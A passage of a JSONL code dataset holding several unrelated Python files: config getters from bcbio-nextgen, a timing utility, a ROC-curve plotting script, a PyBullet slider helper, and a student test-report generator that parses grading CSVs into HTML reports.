logger.error(\"%s fails check %s.\" % (value, checker))\n sys.exit(1)\n return tz.update_in(config, keys, lambda x: value, default=value)\n return update\n\ndef is_setter(keys):\n def present(config):\n try:\n value = tz.get_in(keys, config, no_default=True)\n except:\n value = False\n return True if value else False\n return present\n\n\"\"\"\ngenerate the getter and setter functions but don't override any explicitly\ndefined\n\"\"\"\n_g = globals()\nfor k, v in LOOKUPS.items():\n keys = v['keys']\n getter_fn = 'get_' + k\n if getter_fn not in _g:\n _g[\"get_\" + k] = getter(keys, v.get('default', None), v.get(\"always_list\", False))\n setter_fn = 'set_' + k\n if setter_fn not in _g:\n _g[\"set_\" + k] = setter(keys, v.get('checker', None))\n is_setter_fn = \"is_set\" + k\n if is_setter_fn not in _g:\n _g[\"is_set_\" + k] = is_setter(keys)\n\ndef sample_data_iterator(samples):\n \"\"\"\n for a list of samples, return the data dictionary of each sample\n \"\"\"\n for sample in samples:\n yield sample[0]\n\ndef get_in_samples(samples, fn):\n \"\"\"\n for a list of samples, return the value of a global option\n \"\"\"\n for sample in samples:\n if fn(sample[0], None):\n return fn(sample[0])\n return None\n\ndef get_keys(lookup):\n \"\"\"\n return the keys used to look up a function in the datadict\n \"\"\"\n return tz.get_in((lookup, \"keys\"), LOOKUPS, None)\n","repo_name":"YTLogos/bcbio-nextgen","sub_path":"bcbio/pipeline/datadict.py","file_name":"datadict.py","file_ext":"py","file_size_in_byte":15014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7561043452","text":"import json\nimport os\nfrom timeit import default_timer\nfrom typing import Dict, List, Union\n\nfrom manyfold.utils import gcp\n\nEntry = Union[List[float], Dict[str, float], float]\n\n\nclass RecordTime:\n \"\"\"Record blocks of python code by placing in the `with RecordTime(...)` block.\n\n If the `file_path` is provided and starts with 'gs://' upload a json file to the\n gcloud bucket. If the `file_path` is provided and doesn't start with 'gs://' it will\n be written locally.\n\n Usage:\n # Add to a timings json file: Dict[str, float], or add the entry to a new file.\n with RecordTime(\"some_name\", file_path):\n ...\n # OR:\n # add the entry to a dictionary, no file written to.\n with RecordTime(\"some_name\", timings_dict=timings_dict):\n ...\n # OR:\n # If you only want one timing in the current block of code.\n with RecordTime() as rt:\n ...\n t = rt.elapsed\n # OR:\n # Add a timing dictionary to the timings json file.\n RecordTime.manually_add(file_path, \"some_name\", some_timings_data)\n \"\"\"\n\n def __init__(\n self,\n name: str = \"\",\n file_path: str = \"\",\n timings_dict: Dict[str, float] = None,\n pbar=None,\n overwrite_entry=True,\n ):\n self.file_path = file_path\n self.name = name\n self.overwrite = overwrite_entry\n self.stdout = print if pbar is None else pbar.set_description\n self.timings_dict = {} if timings_dict is None else timings_dict\n\n def __enter__(self):\n self.stdout(f\"timing: {self.name}...\")\n self.t = default_timer()\n return self\n\n @staticmethod\n def _read(file_path):\n if file_path.startswith(\"gs://\"):\n return json.loads(gcp.download(file_path)) if gcp.is_blob(file_path) else {}\n else:\n return json.loads(open(file_path)) if os.path.isfile(file_path) else {}\n\n @staticmethod\n def _write(file_path, times: Dict[str, Entry]):\n jstr = json.dumps(times, indent=4, sort_keys=True)\n if file_path.startswith(\"gs://\"):\n gcp.upload(jstr, file_path, from_string=True)\n else:\n with open(file_path, \"w\") as f:\n f.write(jstr)\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.stdout(\"done\")\n self.elapsed = default_timer() - self.t\n if self.file_path != \"\":\n times = self._read(self.file_path)\n if self.name not in times or self.overwrite:\n times[self.name] = self.elapsed\n RecordTime._write(self.file_path, times)\n else:\n self.stdout(f\"{self.name} not written because overwrite is False.\")\n elif self.timings_dict is not None:\n self.timings_dict[self.name] = self.elapsed\n\n @staticmethod\n def manually_add(file_path: str, name: str, value: Entry):\n times = RecordTime._read(file_path)\n times[name] = value\n RecordTime._write(file_path, times)\n","repo_name":"instadeepai/manyfold","sub_path":"manyfold/utils/timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"85"} +{"seq_id":"25800895207","text":"\nimport os,sys\n# import time, datetime\nsys.path.insert(0, '/home/madhu/work/codes')\nfrom main import check_endWith, check_create_dir, check_env, read_file, write_file, count_lines, save_file\n\nimport TS_finetune_pred_MP\nfrom datetime import datetime\n\nimport warnings\n# warnings.filterwarnings(\"ignore\", category=FutureWarning)\nwarnings.filterwarnings(\"ignore\")\n\nfrom sklearn.metrics import roc_auc_score, roc_curve\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n'''\nThis script draws the ROC curves.\nAt the moment, it reads the log output file and calculates the probs and true labels \n'''\n\nif __name__=='__main__' and '__file__' in globals():\n\n check_env('torch')\n\n startTime = datetime.now()\n current_time = startTime.strftime(\"%Y/%m/%d at %H:%M:%S\")\n print('\\n\\nThe script starting at: ' + str(current_time), ' \\n\\n' )\n\n # log_file_name = '/home/madhu/Logs/predict__train_p3_ALL_A_BilstmMean.layers3.hs512.F.lr1000.b256.p1000.GPU.ep1.270011.pt__A.log'\n \n log_file_name = sys.argv[1]\n REF_GENOME = sys.argv[2]\n save_folder = sys.argv[3]\n check_endWith(save_folder)\n\n log_file_content = read_file(log_file_name)\n ref_gene_content = read_file(REF_GENOME)\n\n # pred_folder = sys.argv[9]\n # print(log_file_content.split('Pred: ')[0:2])\n # print(ref_gene_content)\n\n gene_list = []\n for a_part in ref_gene_content.split('\\n'):\n if a_part.startswith('>'):\n gene_list.append( a_part.split('>')[1] )\n # print( a_part.split('>')[1] )\n # for a_gene_part in a_part.split('>'):\n # print('a_gene_part: ', a_gene_part)\n y_true = []\n y_score = []\n for a_part in log_file_content.split('\\n'):\n # if a_part.startswith('Pred: '+):\n # a_part.split()\n for a_gene in gene_list:\n if a_part.startswith('Pred: '+a_gene):\n info_part = a_part.split(' ')\n if len(info_part) == 6:\n conf_mat = info_part[2:len(info_part)]\n \n if (int(conf_mat[0])+int(conf_mat[1])) != 0 and (int(conf_mat[2])+int(conf_mat[3])) != 0:\n y_true.append(0)\n y_score.append(int(conf_mat[1])/(int(conf_mat[0])+int(conf_mat[1])))\n # print('y_true: ', y_true)\n # print('y_score: ', y_score)\n\n y_true.append(1)\n y_score.append(int(conf_mat[3])/(int(conf_mat[2])+int(conf_mat[3])))\n # print('y_true: ', y_true)\n # print('y_score: ', y_score)\n \n # if a_part.startswith(a_gene):\n # print( a_part.split(' ') )\n\n # for a_value in a_part.split(' '):\n # if a_value != '':\n # print('a_value: ', a_value)\n\n print('y_true: ', y_true)\n print('y_score: ', y_score)\n\n\n '''\n Draw the ROc curves .... \n '''\n\n saveFig_title = save_folder+save_folder.split('/')[len(save_folder.split('/'))-2]+'__ROC_curve.png'\n\n fpr, tpr, thresholds = roc_curve(y_true, y_score)\n AUC_score = roc_auc_score(y_true, y_score)\n\n save_ROC_results = save_folder+save_folder.split('/')[len(save_folder.split('/'))-2]+'__ROC_results.pkl'\n save_file(save_ROC_results, (fpr, tpr, thresholds, AUC_score))\n\n print('XXXXXXX The AUC score is: ', round(AUC_score, 2))\n fig, ax = plt.subplots(figsize=(20, 10))\n plt.plot(fpr, tpr, 'r', linewidth=2, label='ROC curve [Area Under Curve (AUC = {:.4f})]'.format(AUC_score))\n plt.legend(loc='lower right', fontsize=20)\n plt.plot([0, 1], [0, 1], color='navy', linestyle='--')\n plt.xlim([-0.02, 1.02])\n plt.ylim([-0.02, 1.02])\n plt.xlabel('Specificity', fontsize=20)\n plt.ylabel('Sensitivity', fontsize=20)\n # plt.xlabel('False Positive Rate', fontsize=20)\n # plt.ylabel('True Positive Rate', fontsize=20)\n \n n_split = 11\n xTick_list = []\n for n in np.linspace(0, 1, n_split):\n xTick_list.append(str(int(n*100))+'%')\n # reversing the list\n new_xTick_list = []\n for i in xTick_list:\n new_xTick_list.insert(0, i)\n plt.xticks(np.linspace(0, 1, n_split), new_xTick_list, fontsize=15)\n yTick_list = []\n for n in np.linspace(0, 1, n_split):\n yTick_list.append(str(int(n*100))+'%')\n plt.yticks(np.linspace(0, 1, n_split), yTick_list, fontsize=15)\n plt.grid(color='y', linewidth=0.5)\n \n # plt.title('Mean ROC curve for TB Index Score', fontsize=35)\n plt.show()\n \n \n plt.savefig(saveFig_title)\n print('The ROC figure has been saved at: ', saveFig_title)\n plt.close('all')\n\n \n # executionTime = (datetime.now() - startTime)\n # current_time = datetime.now().strftime(\"%Y/%m/%d at %H:%M:%S\")\n # print('\\n\\nThe script completed at: ' + str(current_time))\n # print('Execution time: ' + str(executionTime), ' \\n\\n')\n\n\n\n","repo_name":"Madhurananda/my_current_work_draft","sub_path":"codes/ML_codes/madhu_codes/plot_ROC.py","file_name":"plot_ROC.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10062931678","text":"import pybullet as p\n\n\nclass SlideBars():\n def __init__(self, Id):\n self.Id = Id\n self.motorNames = []\n self.motorIndices = []\n self.motorLowerLimits = []\n self.motorUpperLimits = []\n self.slideIds = []\n\n self.numJoints = p.getNumJoints(self.Id)\n\n def add_slidebars(self):\n for i in range(self.numJoints):\n jointInfo = p.getJointInfo(self.Id, i)\n jointName = jointInfo[1].decode('ascii')\n qIndex = jointInfo[3]\n lowerLimits = jointInfo[8]\n upperLimits = jointInfo[9]\n if qIndex > -1:\n self.motorNames.append(jointName)\n self.motorIndices.append(i)\n self.motorLowerLimits.append(lowerLimits)\n self.motorUpperLimits.append(upperLimits)\n\n for i in range(len(self.motorIndices)):\n if self.motorLowerLimits[i] <= self.motorUpperLimits[i]:\n slideId = p.addUserDebugParameter(self.motorNames[i],\n self.motorLowerLimits[i],\n self.motorUpperLimits[i], 0)\n else:\n slideId = p.addUserDebugParameter(self.motorNames[i],\n self.motorUpperLimits[i],\n self.motorLowerLimits[i], 0)\n self.slideIds.append(slideId)\n\n return self.motorIndices\n\n def get_slidebars_values(self):\n slidesValues = []\n for i in self.slideIds:\n value = p.readUserDebugParameter(i)\n slidesValues.append(value)\n return slidesValues","repo_name":"borninfreedom/kuka-reach-drl","sub_path":"utils/SlideBars.py","file_name":"SlideBars.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"85"} +{"seq_id":"15057987375","text":"'''\nThis is an import-only object version of main.py.\nFor manipulating the app via python.\n'''\n\n'''\nQT Imports\n'''\nfrom PyQt5.QtWidgets import *\n\n'''\nData Manipulation Imports\n'''\nfrom data_utils import retry\nfrom typing import Callable\nimport numpy as np\nimport json\nimport os.path\nimport shutil as sh\nimport sys\nimport os\nimport pandas as pd\nfrom datetime import (datetime, timedelta)\nfrom tqdm import tqdm\nfrom bs4 import BeautifulSoup\nfrom glob import glob\nimport time\nfrom pathlib import Path\n\n'''\nUtils Imports\n'''\nfrom aws_utils import *\nfrom data_utils import *\nfrom google_utils import *\nfrom graphics_utils import *\nfrom upload_utils import *\nimport score_converters\n\nfrom widgets.meta_window import MetaWindow\nfrom widgets.alert import Alert\n\n'''\nHTML Tools\n'''\nimport dominate\nfrom dominate.tags import *\nfrom dominate.util import raw\n\n\nclass Reportgen():\n def __init__(self,\n resource_path: str,\n debug: bool = True,\n log: bool = True,\n answers_only: bool = False,\n answers_and_topics_only: bool = False,\n ):\n self.log = log\n\n '''\n Debug toggle and debug bypass steps\n '''\n self.debug = debug # Toggles all below to False when on.\n self.skip_generation = self.debug and True\n self.skip_merge = self.debug and (self.skip_generation or True)\n self.skip_notifications = self.debug and True\n self.skip_name_mapping_step = self.debug and True\n self.no_upload_aws = self.debug and True\n self.no_upload_gcp = self.debug and True\n self.no_upload_db = self.debug and True\n self.check_for_reruns = self.debug and False\n\n self.delete_non_merged = True\n\n '''\n Default User-Toggleable States\n '''\n self.answers_only = answers_only\n self.answers_and_topics_only = answers_and_topics_only\n\n self.nl = '\\n'\n\n '''\n Key Init Steps\n '''\n home_path = os.environ['HOME']\n # Path to core data - local breakdown copy, etc...\n self.data_path = os.path.join(home_path, 'REDACTED')\n if not os.path.exists(self.data_path):\n print('This appears to be a fresh install - initializing cache!')\n os.mkdir(self.data_path)\n self.mem_path = os.path.join(self.data_path, 'memory.json')\n self.resource_path = resource_path # 'src/main/resources/'\n self.install_resource_path = os.path.join(self.resource_path, 'install')\n\n '''\n Reinit Memory if Not Found\n '''\n if not os.path.exists(self.mem_path):\n print('Memfile not found; reinitializing from backup.')\n mem_install_path = os.path.join(self.install_resource_path, 'memory_init.json')\n sh.copy(mem_install_path, self.mem_path)\n\n '''\n Load Memory, and reinit memory files if not found.\n Then save.\n '''\n self.mem = load_json(self.mem_path)\n self.db_path = os.path.join(self.data_path, 'db')\n if not os.path.exists(self.db_path):\n os.mkdir(self.db_path)\n\n if not self.mem['paths_set']:\n print('Memory Key Paths not set; recreating them from defaults now.')\n for k in self.mem['db_info'].keys():\n mkdir_force(os.path.join(self.db_path, k))\n\n self.mem['db_info']['bkdn']['path'] = os.path.join(self.db_path, 'bkdn')\n self.mem['db_info']['protocols']['path'] = os.path.join(self.db_path, 'protocols')\n self.mem['paths_set'] = True\n\n self.save_mem()\n\n '''\n I/O path selection\n '''\n self.BREAKDOWN_PATH = self.mem['db_info']['bkdn']['path']\n self.BKDN_SHEET_ID = self.mem['db_info']['bkdn']['sheet_id']\n self.TEST_PROTOCOLS_PATH = self.mem['db_info']['protocols']['path']\n self.TEST_PROTOCOLS_SHEET_ID = self.mem['db_info']['protocols']['sheet_id']\n\n self.OUTPUT_PATH = None # Will be set by widget during init.\n\n self.LAST_UPDATE = parse_datetime(self.mem['db_info']['last_updated'])\n if (not self.LAST_UPDATE) or (self.LAST_UPDATE < (datetime.now() - timedelta(days=1))):\n print('UPDATING TEST DATABASE')\n self.db_update(as_init=True)\n self.mem['db_info']['last_updated'] = datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")\n self.save_mem()\n\n self.bkdn_dfs = pickle_load(self.BREAKDOWN_PATH)\n self.test_name_options = [k for k in self.bkdn_dfs.keys() if k[0] != '_']\n\n self.TEST_NAME = None\n self.NAME_ID_MAP = dict()\n self.SECTIONS = None\n self.sections_present = []\n\n self.bkdn = None\n self.test_order = None\n\n self.chosen_files = []\n\n self.raw_reports = dict()\n self.student = None\n\n self.test_meta_info = None\n\n def home(self):\n '''\n Include the below two lines to refresh options after db update:\n '''\n self.bkdn_dfs = pickle_load(self.BREAKDOWN_PATH)\n self.test_name_options = [k for k in self.bkdn_dfs.keys() if k[0] != '_']\n\n print_conditional(f'Output path: {self.OUTPUT_PATH}', self.log)\n\n def set_params(self, test_name: str,\n test_meta_info: dict,\n chosen_files: list):\n self.TEST_NAME = test_name\n assert test_meta_info.get('test_date') != None\n self.test_meta_info = test_meta_info\n print_conditional(self.test_meta_info, self.log)\n self.chosen_files = chosen_files\n\n assert self.params_set()\n\n def db_update(self, as_init=False):\n persisted_creds_path = os.path.join(self.resource_path, 'REDACTED')\n CREDS_PATH = persisted_creds_path\n TOKEN_PATH = os.path.join(self.resource_path, 'REDACTED')\n service = sheets_auth(TOKEN_PATH, CREDS_PATH)\n for key, value in self.mem['db_info'].items():\n if key != 'last_updated':\n print_conditional(f'Updating: {key.upper()}', self.log)\n self.sheet_update(service, value)\n if not as_init:\n # re_init home\n self.home()\n\n def sheet_update(self, service, sheet_info):\n meta = service.spreadsheets().get(spreadsheetId=sheet_info['sheet_id']).execute()\n sheets = [s['properties']['title'] for s in meta['sheets']]\n params = {'spreadsheetId': sheet_info['sheet_id'], 'ranges': sheets, 'majorDimension': 'ROWS'}\n result = service.spreadsheets().values().batchGet(**params).execute()\n all_sheets = result['valueRanges']\n sheet_dfs = {name: self.sheet_to_df(sheet) for name, sheet in tqdm(zip(sheets, all_sheets))}\n pickle_save(sheet_info['path'], sheet_dfs)\n\n def sheet_to_df(self, sheet):\n # Call the Sheets API\n values = sheet.get('values', [])\n df = pd.DataFrame.from_records(values).fillna('N/A')\n h = df.iloc[0]\n df = df.iloc[1:]\n df.columns = h\n return df\n\n def save_mem(self):\n # Save and reload.\n write_json(self.mem, self.mem_path)\n self.mem = load_json(self.mem_path)\n print_conditional(self.mem['db_info']['last_updated'], self.log)\n\n def save_selected_input_files_to_memory(self, files):\n # Save selected files location so future selection opens the same dir\n default_dir = str(Path(files[0]).parent)\n self.mem['input_select_default_dir'] = default_dir\n self.save_mem()\n self.chosen_files = files\n\n def change_output_folder(self, new_outpath):\n self.mem['output_select_default_dir'] = str(Path(new_outpath).parent)\n self.mem['io']['outpath'] = new_outpath\n self.save_mem()\n self.OUTPUT_PATH = new_outpath\n\n def reset_to_do_more(self):\n self.chosen_files = []\n self.TEST_NAME = None\n\n def params_set(self):\n must_be_non_null = [\n self.TEST_NAME,\n self.test_meta_info\n\n ]\n must_be_true = [\n len(self.chosen_files) > 0,\n ]\n\n print_conditional([must_be_non_null, must_be_true], self.log)\n return (None not in must_be_non_null) and (False not in must_be_true)\n\n def prepare_for_parse(self):\n self.bkdn = self.bkdn_dfs[self.TEST_NAME]\n # Remove extraneous whitespace from data.\n for c in self.bkdn.columns:\n self.bkdn[c] = self.bkdn[c].apply(lambda x: str(x).strip())\n # Remove all bash-reserved chars from bkdn:\n self.bkdn = self.bkdn.applymap(remove_problematic_chars)\n\n # Alter column names for ease of indexing:\n self.bkdn.columns = [strp_nonanum(c).lower() for c in self.bkdn.columns]\n self.bkdn = self.bkdn.replace('', np.nan)\n\n '''\n Compress Subtopics into One Column:\n '''\n subtopic_cols = self.bkdn[[col for col in self.bkdn.columns if 'subtopic' in col.lower()]]\n if self.debug:\n pickle_save(ensure_path(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/subtopic_cols.pickle')),\n subtopic_cols)\n\n self.bkdn = self.bkdn.drop(subtopic_cols, axis=1)\n\n if self.debug:\n pickle_save(\n ensure_path(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/debug_bkdn_prejoin.pickle')),\n self.bkdn)\n\n self.test_order = self.bkdn.section.unique()\n\n # Contatenate subtopics with +, while dropping NANs.\n self.bkdn['subtopic'] = subtopic_cols.apply(lambda x: ' + '.join([str(v) for v in x.dropna().values]),\n axis=1)\n self.bkdn.index = pd.Index([str(i) for i in self.bkdn.index])\n\n # Update Sections, Subsections\n self.SECTIONS = self.bkdn.section.unique()\n\n def parse_reports(self):\n '''\n :return: a DataFrame containing the score data from a given test.\n '''\n assert self.params_set(), 'You are attempting to parse reports out of sequence. Please run self.set_params.'\n\n self.chosen_files = sorted(self.chosen_files)\n report_paths = sorted([os.path.relpath(p) for p in self.chosen_files]).copy()\n debug_report_paths = sorted([os.path.abspath(p) for p in self.chosen_files]).copy()\n\n # This function fills missing student data with NANs between reports.\n # Returns any files that are completely empty.\n empty_files = fix_missing_students(report_paths.copy())\n empty_fnames = [Path(p).name for p in empty_files]\n print_conditional(['Ignoring: ', empty_fnames], self.log)\n\n report = pd.DataFrame()\n\n if self.debug:\n pickle_save(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/bkdn_parse_step.pickle'), self.bkdn)\n pickle_save(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/report_paths_parse_step.pickle'),\n debug_report_paths)\n\n # Iterate through reports (separated by section)\n\n files_to_upload = []\n for path in report_paths:\n if Path(path).name not in empty_fnames:\n files_to_upload.append(os.path.abspath(path))\n\n print_conditional(self.SECTIONS, self.log)\n # try:\n print_conditional(self.bkdn.columns, self.log)\n path_fname = path.split('/')[-1].split('.')[0]\n print_conditional(path_fname, self.log)\n filtered = self.bkdn[self.bkdn.correspondingfilename.str.upper() == path_fname.upper()]\n\n try:\n section = filtered.section.unique()[0]\n except:\n Alert(\n f\"Couldn't find Corresponding_File_Names {self.bkdn.correspondingfilename.unique()} for test {self.TEST_NAME} in input files; are you using the right reports?\",\n title='Wrong Test Name (Likely)')\n assert False\n subsection = filtered.subsection\n a_df = pd.read_csv(path)\n # Reformat columns for easy indexing:\n a_df.columns = ['_'.join(c.split()) for c in a_df.columns]\n\n self.raw_reports[section] = a_df\n\n # Copy df for safety.\n a_new = a_df.copy()\n\n key = a_new[a_new.First_Name == 'Answer Key'].iloc[:, 9:].T\n key.columns = ['key']\n\n students_data = a_new[a_new.First_Name != 'Answer Key']\n names = students_data['First_Name'] + ' ' + students_data['Last_Name']\n\n # Map each student to their student ID (gradecam)\n section_name_id_map = pd.concat([students_data.Student_ID, names], axis=1)\n section_name_id_map.columns = ['id', 'name']\n section_name_id_map = section_name_id_map.set_index('name').to_dict()['id']\n self.NAME_ID_MAP.update(section_name_id_map)\n\n responses = students_data.iloc[:, 9:]\n # Grab and format student names\n students = responses.set_index(names).T\n\n if self.debug:\n pickle_save(\n os.path.join(self.data_path, f'debug/{self.TEST_NAME}/students_isolated_from_report.pickle'),\n students)\n\n # Fillna with \"N/A\" so that empty answers are not dropped from the df.\n data = pd.concat([key, students], axis=1).fillna('N/A')\n\n data['section'] = section\n data['subsection'] = subsection\n self.sections_present.append(section)\n\n # Remove duplicated student name columns - students with duplicate entries.\n data = (data.T.loc[~data.T.index.duplicated(keep='first')]).T\n\n report = pd.concat([report, data], axis=0, sort=True)\n\n else:\n print_conditional(f'Skipping: {path}', self.log)\n\n if self.debug:\n pickle_save(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/parsed_report.pickle'), report)\n pickle_save(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/name_id_map.pickle'), self.NAME_ID_MAP)\n\n return report\n\n def generate(self, data):\n student_in_section = (data.groupby('section').count() > 0)\n print_conditional('Students in each section:', self.log)\n print_conditional(student_in_section, self.log)\n\n # Further parse breakdown now that parse_reports has detected which subsections are present in the data.\n self.bkdn = self.bkdn[self.bkdn.section.apply(lambda x: x in self.sections_present)]\n\n # Reindex to allow for subsection alignment:\n self.bkdn.index = self.bkdn.section + '-' + self.bkdn.ques\n data.index = data.section + '-' + data.index\n\n students = [c for c in data.columns.dropna() if ('key' != c.lower()) \\\n and ('section' != c.lower()) \\\n and ('subsection' != c.lower())]\n\n if self.debug:\n pickle_save(ensure_path(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/debug_bkdn.pickle')),\n self.bkdn)\n pickle_save(\n ensure_path(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/{self.TEST_NAME}_data.pickle')),\n data)\n pickle_save(ensure_path(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/students_debug.pickle')),\n students)\n\n test_output_path = os.path.join(self.OUTPUT_PATH,\n f'{self.TEST_NAME} - {self.test_meta_info[\"test_date\"]}')\n\n if not os.path.exists(test_output_path):\n os.mkdir(test_output_path)\n\n all_report_contexts = []\n for student in tqdm(students):\n student_id = self.NAME_ID_MAP[student]\n\n already_run = False\n already_run_message = ''\n if self.check_for_reruns:\n already_run_message, already_run = is_already_run(student_id, self.TEST_NAME)\n if not already_run:\n student_output_path = os.path.join(test_output_path, student)\n if os.path.exists(student_output_path):\n sh.rmtree(student_output_path)\n os.mkdir(student_output_path)\n\n report_context = {'sections': [],\n 'outdir': student_output_path,\n 'test_outdir': test_output_path,\n 'student_outdir': student_output_path,\n 'student': student,\n 'test_name': self.TEST_NAME,\n 'bkdn_dfs': self.bkdn_dfs}\n\n if student != 'key':\n\n student_answers = data[['key', student]].copy()\n student_answers = check_answers(student_answers, student)\n\n report_context['answers'] = student_answers\n report_context['bkdn'] = self.bkdn\n\n student_ans_w_bkdn = pd.concat([student_answers, self.bkdn], axis=1, sort=False) # .dropna()\n if self.debug:\n pickle_save(ensure_path(\n os.path.join(self.data_path, f'debug/{self.TEST_NAME}/{student}_ansWbkdn.pickle')),\n student_ans_w_bkdn)\n\n '''\n HERE: Iterate through sections!\n \n data filestructure:\n data-|\n |-TEST_NAME -|-student_1 -|-section1-(imgs)\n | |-section2\n | |-output_html\n | |-output_pdf\n |-student_2...\n \n '''\n for section in self.test_order:\n # Only process the data if the section is present, and the student is in the section:\n if (section in self.sections_present) and (student_in_section.get(student, {}).get(section)):\n report_context['sections'].append(section)\n report_context[section] = dict()\n\n section_imgs_path = os.path.join(student_output_path, section)\n if not os.path.exists(section_imgs_path):\n os.mkdir(section_imgs_path)\n\n section_df = student_ans_w_bkdn[student_ans_w_bkdn.section == section].copy()\n # fill in any nans:\n null_values = [np.nan, '']\n section_df = section_df.applymap(lambda x: 'NA' if x in null_values else x).fillna('NA')\n\n if self.debug:\n pickle_save(ensure_path(os.path.join(self.data_path,\n f'debug/{self.TEST_NAME}/{student}_{section}_df.pickle')),\n section_df)\n\n report_context[section]['df'] = section_df\n\n '''\n Calc Section Data for Cover Sheet:\n '''\n raw_data = self.raw_reports[section]\n print_conditional(section, self.log)\n # If there are any NA values in the 'correct' column, cast back to boolean FALSE.\n report_context[section]['n_correct'] = section_df.correct.apply(\n lambda x: False if x == 'NA' else x).sum()\n report_context[section]['n_total'] = section_df.shape[0]\n report_context['teacher_name'] = \\\n (raw_data.Teacher_First_Name + ' ' + raw_data.Teacher_Last_Name).dropna().iloc[0]\n\n paths_dict = dict()\n if (not self.answers_only) and (not self.skip_generation):\n # try\n topics_plot_path = section_topics_barplot_gen(section_df, student, section,\n section_imgs_path)\n\n subtopic_imgs_path = os.path.join(section_imgs_path, 'subsections')\n if not os.path.exists(subtopic_imgs_path):\n os.mkdir(subtopic_imgs_path)\n\n subtopics_plot_paths = section_subtopics_barplot_gen(section_df, student, section,\n subtopic_imgs_path)\n\n paths_dict = {'topic_fig': topics_plot_path,\n 'subtopic_figs': subtopics_plot_paths}\n\n if not self.skip_generation:\n self.write_report(student, self.TEST_NAME, section, \\\n section_df, paths_dict, test_output_path)\n\n # Outside of sections loop - only do once per student!\n if self.debug:\n pickle_save(\n ensure_path(f\"{self.data_path}/debug/{self.TEST_NAME}/{student}_coversheet_data.pickle\"),\n report_context)\n\n report_context['scores'] = score_converters.convert(report_context)\n\n if not self.skip_generation:\n self.write_coversheet(report_context)\n\n all_report_contexts.append(report_context)\n else:\n print(already_run_message)\n return test_output_path, all_report_contexts\n\n def gen_report_data(self, return_data=False, reset_after=False):\n '''\n Ensure no None values where necessary.\n '''\n\n assert self.params_set(), 'You are attempting to generate reports out of sequence. Please run self.set_params.'\n\n self.prepare_for_parse()\n\n data = self.parse_reports()\n\n test_output_path, all_report_contexts = self.generate(data)\n if len(all_report_contexts) > 0:\n self.merge_and_upload_reports(test_output_path, all_report_contexts)\n else:\n print('No reports to merge! Stopping run.')\n\n if reset_after:\n self.reset_to_do_more()\n\n if return_data:\n return {\n 'output_dest': test_output_path,\n 'contexts': all_report_contexts\n }\n\n def write_report(self, student, TEST_NAME, section, section_df, img_paths_dict, test_output_path):\n fname = f'{student}_{TEST_NAME}_{section}_report'.upper() + '.html'\n\n report_path = os.path.join(test_output_path, student)\n\n '''\n COPY resource_dir to outpath dir.\n '''\n\n path_to_styles = os.path.join(self.resource_path, 'base/styles')\n style_dest = os.path.join(report_path, 'styles')\n\n '''\n Move images, CSS and JS styles into student output dir if it doesn't already exist.\n '''\n if not os.path.exists(style_dest):\n print_conditional('Creating styles dir in:', self.log)\n print_conditional(style_dest, self.log)\n sh.copytree(path_to_styles, os.path.join(report_path, 'styles'))\n sh.copytree(os.path.join(self.resource_path, 'base/imgs'), os.path.join(report_path, 'imgs'))\n\n outpath = os.path.join(report_path, fname)\n doc = dominate.document(title=fname)\n\n '''\n Table Report Row Gen\n '''\n v = section_df.iloc[:, 1:4]\n v.columns = ['A', 'correct', 'Q']\n\n table_styles, table_html = make_report_table(section_df)\n\n '''\n Make the Doc\n '''\n with doc.head:\n link(rel='stylesheet', href='styles/css/bootstrap.css')\n link(rel='stylesheet', href=\"styles/css/report_styles.css\")\n raw(table_styles)\n\n with doc.body:\n '''\n REPORT PAGE (Answers, comments)\n '''\n div(h1(f'{student.title()} - Section: {section.upper()}'), _class='jumbotron text-center')\n p(f'{student}{section}{TEST_NAME}', _class='d-none', id='Info')\n with div(_class='container'):\n '''\n Row 1: Answers Table row:\n '''\n with div(_class='row'):\n '''\n raw(t.to_html(index=False, \\\n classes=[\"table-bordered\", \"table-striped\", \"table-hover\"], \\\n justify='center'))\n '''\n raw(table_html)\n with div(_class='row'):\n # u(h3('Evaluation', id='eval'))\n pass\n\n if not self.answers_only:\n '''\n Charts Page\n Plot Main Topic Fig:\n '''\n # Break page\n raw('

')\n\n with div(_class='container'):\n '''\n Row 2: Img reports\n '''\n with div(_class='row'):\n topic_img = img_paths_dict['topic_fig']\n div(img(src=topic_img, _class='img-fluid'), _class='col-12 text-center')\n\n '''\n Plot Subtopic Figs\n '''\n if not self.answers_and_topics_only:\n subtopic_imgs = img_paths_dict['subtopic_figs']\n n_per_page = 4\n n_per_row = 2\n subtopic_img_lists = chunk_list(subtopic_imgs, n_per_page)\n for list_idx, img_list in enumerate(subtopic_img_lists):\n with div(_class='container'):\n img_grid = div(_class='container')\n curr_row = div(_class='row')\n for idx, ipath in enumerate(img_list):\n if (idx % n_per_row == 0) and (idx > 1):\n # Append finished row:\n img_grid.add(curr_row)\n # New row:\n curr_row = div(_class='row')\n img_div = div(_class='col-6')\n img_div.add(img(src=ipath, _class='img-fluid'))\n curr_row.add(img_div)\n\n if list_idx < len(subtopic_img_lists) - 1:\n # Break page after each grid of images.\n raw('

